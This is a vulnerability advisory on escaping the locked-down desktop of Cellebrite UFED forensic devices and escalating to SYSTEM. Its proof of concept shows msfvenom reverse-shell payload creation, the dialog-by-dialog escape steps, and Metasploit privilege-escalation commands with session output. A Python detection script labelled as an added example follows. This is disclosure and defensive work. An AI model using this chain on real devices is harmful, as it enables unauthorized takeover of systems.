Security Advisory

Cellebrite Restricted Desktop Escape and Escalation of User Privilege

Advisory ID
KL-001-2020-002
Published
2020-05-14
Vendor
Cellebrite

Affected Systems

Product
UFED
Version
5.0 - 7.5.0.845
Platform
Embedded Windows

Discovered By

Matt Bergin (KoreLogic)

Vulnerability Details

Affected Vendor: Cellebrite
Affected Product: UFED
Affected Version: 5.0 - 7.5.0.845
Platform: Embedded Windows
CWE Classification: CWE-269: Improper Privilege Management, CWE-20: Improper Input Validation
CVE ID: CVE-2020-12798

Vulnerability Description

The Cellebrite UFED device implements local operating system policies that can be circumvented to obtain a command prompt. From there, privilege escalation is possible using public exploits.

Technical Description

The Cellebrite UFED device implements local operating system policies which are designed to limit access to operating system functionality. These include but may not be limited to:

  1. Preventing access to dialogs such as Run, File Browser, and Explorer.

  2. Preventing access to process and application management tools such as Task Manager and the Control Panel.

These policies can be circumvented using functionality that the desktop policy still permits. A user can open the Wireless Network Connection dialog and select certificate-based (IEEE 802.1x) authentication; the certificate export wizard reachable from there exposes a file dialog that can be used to launch a command prompt. From that prompt, privileges can be elevated using off-the-shelf, publicly available exploits for the specific Windows version in use.

Mitigation and Remediation Recommendation

The vendor has informed KoreLogic that this vulnerability is not present on devices manufactured “at least since 2018.” The vendor was uncertain of the exact version number that remediated this attack vector.

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

Proof of Concept

Begin by using msfvenom to create a Meterpreter payload that connects back to a command-and-control (C2) listener. Copy the payload to a USB drive. Then use msfconsole to start a handler for that connection with the exploit/multi/handler module.

  $ msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe LHOST=[REDACTED] LPORT=8888
  [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  [-] No arch selected, selecting arch: x86 from the payload
  No encoder or badchars specified, outputting raw payload
  Payload size: 341 bytes
  Final size of exe file: 73802 bytes
  Saved as: payload.exe
  $ sudo mount -o rw /dev/sda1 a/
  $ sudo cp payload.exe a/
  $ sync
  $ sudo umount a/
  $ msfconsole
  [snip]
  msf5 exploit(multi/handler) > show options

  Module options (exploit/multi/handler):

     Name  Current Setting  Required  Description
     ----  ---------------  --------  -----------


  Payload options (windows/meterpreter/reverse_tcp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
     LHOST     [REDACTED]       yes       The listen address (an interface may be specified)
     LPORT     8888             yes       The listen port


  Exploit target:

     Id  Name
     --  ----
     0   Wildcard Target


  msf5 exploit(multi/handler) > exploit -j -z
  [*] Exploit running as background job 1.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on [REDACTED]:8888

Now insert the USB drive containing payload.exe into the target Cellebrite device, then follow the steps below:

  1. Open the Wireless Network Connection screen by clicking on the WiFi icon in the bottom right hand corner of the screen. This should be next to the system clock.

  2. Select “Change advanced settings” — this will bring up a screen called Windows Network Connection Properties. Choose the Wireless Networks tab.

  3. Under the Preferred networks section, click the Add button and then select the Authentication tab. Make sure “Enable IEEE 802.1x authentication for this network” is enabled.

  4. Under EAP Type, select “Smart Card or other Certificate” and then click the Properties button.

  5. Under Trusted Root Certificate Authorities click the View Certificate button. This will bring up a screen called Certificate, choose the Details tab and click the “Copy to File” button. This will bring up a screen called Certificate Export Wizard.

  6. Click Next and select any of the available export format options. For example, choose the “DER encoded binary X.509” option and click next.

  7. Instead of typing out an export path, click the Browse button to open a file dialog. In the “File Name” box type: \WINDOWS\System32\ and under “Save as type” select the “All Files (*.*)” option. Press the Enter key.

  8. Locate cmd.exe, then drag and drop any DLL onto it. For example, choose clusapi.dll, which sits in the same directory near cmd.exe. Explorer launches the drop target with the dropped file path as its argument, so this opens a Command Prompt running as the unprivileged desktop user.

  9. Type the drive letter to change to the USB drive containing payload.exe, then run it.

  C:\windows\system32>D:
  D:\>payload.exe

This results in a connection back into Metasploit.

  [*] Sending stage (180291 bytes) to [REDACTED]
  [*] Meterpreter session 2 opened ([REDACTED]:8888 -> [REDACTED]:1041) at 2020-01-29 11:41:05 -0800
  msf5 exploit(multi/handler) > sessions -i 2
  [*] Starting interaction with 2...
  meterpreter > getuid
  Server username: TOUCH-[REDACTED]\Operator
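The chain above leaves two distinctive traces in process-creation telemetry: an interactive shell spawned by explorer.exe whose command line carries a DLL path (the drag-and-drop launch), and a process executing from a drive other than the system drive (payload.exe on the USB stick). The following detection logic is an added example and is not part of the KoreLogic advisory; it assumes 4688-style key=value records with command-line auditing (field names SubjectUserName, NewProcessName, ParentProcessName, CommandLine) and that Explorer's drag-and-drop passes the dropped file's path as the first argument. The sample records are constructed to mirror the PoC, not captured from a device.

```python
"""Flag the restricted-desktop escape chain in process-creation records.

Added example, not code from the advisory. Assumptions: records are
'key=value|key=value' lines with 4688-style field names (constructed here),
and dropping a file onto an executable in Explorer launches that executable
with the dropped path as its argument.
"""
import re
from dataclasses import dataclass

SYSTEM_DRIVE = "C:"  # anything else is treated as removable/foreign media
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


@dataclass(frozen=True)
class ProcEvent:
    user: str
    image: str      # full path of the new process
    parent: str     # full path of the creating process
    cmdline: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'key=value|key=value' process-creation record."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split("|"))
    return ProcEvent(
        user=fields["SubjectUserName"],
        image=fields["NewProcessName"],
        parent=fields.get("ParentProcessName", ""),
        cmdline=fields.get("CommandLine", ""),
    )


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def dropped_dll_args(cmdline: str) -> list[str]:
    """Arguments after the program token that are DLL paths (quoted or bare)."""
    tokens = [a or b for a, b in re.findall(r'"([^"]+)"|(\S+)', cmdline)]
    return [t for t in tokens[1:] if t.lower().endswith(".dll")]


def check_event(ev: ProcEvent) -> list[str]:
    """Return a description for each detection rule the event matches."""
    findings = []
    # Rule 1: an interactive shell started by Explorer with a DLL as its
    # argument is the signature of dragging a DLL onto cmd.exe in a file dialog.
    if (basename(ev.parent) == "explorer.exe"
            and basename(ev.image) in SHELLS
            and dropped_dll_args(ev.cmdline)):
        findings.append("shell launched from Explorer with a DLL path argument "
                        "(drag-and-drop onto the shell binary)")
    # Rule 2: on a kiosk, nothing should execute from a non-system drive.
    drive = ev.image[:2].upper()
    if re.fullmatch(r"[A-Z]:", drive) and drive != SYSTEM_DRIVE.upper():
        findings.append(f"execution from non-system drive {drive} (removable media)")
    return findings


def scan(lines: list[str]) -> list[tuple[str, str]]:
    """Run every rule over every record; returns (image, finding) pairs."""
    results = []
    for line in lines:
        ev = parse_event(line)
        for finding in check_event(ev):
            results.append((ev.image, finding))
    return results


# Constructed records mirroring the PoC chain (not captured from a UFED device).
SAMPLE_LOG = [
    r"SubjectUserName=Operator|NewProcessName=C:\WINDOWS\system32\rundll32.exe|ParentProcessName=C:\WINDOWS\explorer.exe|CommandLine=rundll32.exe shell32.dll,Control_RunDLL",
    r'SubjectUserName=Operator|NewProcessName=C:\WINDOWS\system32\cmd.exe|ParentProcessName=C:\WINDOWS\explorer.exe|CommandLine="C:\WINDOWS\system32\cmd.exe" "C:\WINDOWS\System32\clusapi.dll"',
    r"SubjectUserName=Operator|NewProcessName=D:\payload.exe|ParentProcessName=C:\WINDOWS\system32\cmd.exe|CommandLine=payload.exe",
    r"SubjectUserName=Operator|NewProcessName=C:\WINDOWS\system32\cmd.exe|ParentProcessName=C:\Program Files\Vendor\app.exe|CommandLine=cmd.exe /c dir",
]

if __name__ == "__main__":
    for image, finding in scan(SAMPLE_LOG):
        print(f"{image}: {finding}")
```

The first record (Control Panel launched through rundll32) and the last (a vendor application running a scripted cmd /c) are negatives: only the drag-and-drop cmd.exe and the payload on D: are reported. Rule 1 is deliberately narrow; on a kiosk that is supposed to forbid any command prompt, a practitioner would normally also alert on any interactive shell under explorer.exe regardless of arguments.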

The Metasploit local privilege escalation module for MS15-051 (CVE-2015-1701, a win32k.sys vulnerability) is then configured to run against the unprivileged session, and SYSTEM is obtained.

  msf5 exploit(windows/local/ms15_051_client_copy_image) > show options

  Module options (exploit/windows/local/ms15_051_client_copy_image):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     SESSION                   yes       The session to run this module on.


  Exploit target:

     Id  Name
     --  ----
     0   Windows x86

  msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 2
  SESSION => 2
  msf5 exploit(windows/local/ms15_051_client_copy_image) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf5 exploit(windows/local/ms15_051_client_copy_image) > set LPORT 8888
  LPORT => 8888
  msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST [REDACTED]
  LHOST => [REDACTED]
  msf5 exploit(windows/local/ms15_051_client_copy_image) > run

  [*] Started reverse TCP handler on [REDACTED]:8888
  [*] Launching notepad to host the exploit...
  [+] Process 3936 launched.
  [*] Reflectively injecting the exploit DLL into 3936...
  [*] Injecting exploit into 3936...
  [*] Exploit injected. Injecting payload into 3936...
  [*] Payload injected. Executing exploit...
  [*] Sending stage (180291 bytes) to [REDACTED]
  [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
  [*] Meterpreter session 3 opened ([REDACTED]:8888 -> [REDACTED]:1045) at 2020-01-29 11:48:15 -0800

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter >

The contents of this advisory are copyright(c) 2020 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Disclosure Timeline

KoreLogic submits vulnerability details to Cellebrite.

Cellebrite acknowledges receipt and the intention to investigate.

KoreLogic requests an update on the status of the vulnerability report.

Cellebrite responds, notifying KoreLogic that the vulnerable dialog is not available on newer UFED releases. Indicates they will determine when the remediation was introduced.

KoreLogic requests an update from Cellebrite.

Cellebrite responds that they do not have the version number at hand, but does not request delaying public disclosure.

MITRE issues CVE-2020-12798.

45 business-days have elapsed since the report was submitted to Cellebrite.

KoreLogic public disclosure.

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable